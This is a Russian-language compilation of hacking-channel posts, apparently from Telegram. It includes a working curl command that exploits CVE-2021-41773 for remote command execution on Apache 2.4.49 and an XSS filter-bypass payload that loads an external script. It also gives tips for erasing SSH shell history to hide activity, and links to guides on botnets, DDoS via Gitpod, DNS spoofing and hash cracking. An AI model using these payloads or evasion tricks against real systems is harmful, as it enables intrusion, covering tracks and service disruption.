Недавняя CVE-2021-41773 в Apache 2.4.49, это не только выход из директории с чтением файлов, как многие подумали

curl --data "A=|echo;id" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

отправьте статью про ботнет, который аура писал

уже нашел: https://teletype.in/@clayn3t/botnet

Race condition в веб-приложениях

https://bo0om.ru/race-condition-ru

Хороший материал по захвату доменов (поддоменов), когда о них забывают:

https://github.com/EdOverflow/can-i-take-over-xyz

Быстрый поиск по эксплойтам и полезным программам. Enjoy!
https://sploitus.com

Не все йогурты одинаково полезны!

Например, настройка в CloudFlare по сжатию страницы ломает Chrome XSS Auditor, что позволяет с легкостью его обойти. Достаточно указать вектор, в котором содержимое атрибутов не будет обрамлено кавычками, Auto Minify CloudFlare все сделает за тебя, а Chrome не увидит, что вектор атаки передался в URL, так как содержимое на странице будет различаться от того, что было передано в запросе.

<noscript/src=//html5sec.org/test.js></noscript>
вжух =>
<noscript src="//html5sec.org/test.js"></noscript>

https://twitter.com/i_bo0om/status/895896778914004993

Бот для поиска готовых эксплойтов

@GetSploitBot

👾DNS атака: как это работает

В этой статье рассмотрим что такое и какие типы атак имеются на DNS.

➖ https://telegra.ph/DNS-spoofing-kak-ehto-rabotaet-06-09

#less | 💀 Этичный хакер

Мануал от @zxc_ulit
https://telegra.ph/DDOS-S-POMOSHCHYU-GITPOD-500k-rq-06-06

Если ты подключен к SSH и хочешь скрыть, что делалось на машине, полезно после всех действий выполнить kill -9 $$

Это убет собственный процесс, а последние команды в .bash_history не запишутся.

Или можно ввести unset HISTFILE (с пробелом в начале), чтобы не писать в историю вовсе.

#Обучение
Взлом хешей с помощью HashCat.
Часть 2

Microsoft запретила россиянам скачивать Windows 10 и 11

Пользователи заметили, что при попытке скачать операционные системы или программу Media Creation Tool появляется страница с ошибкой «404 — File or Directory not found»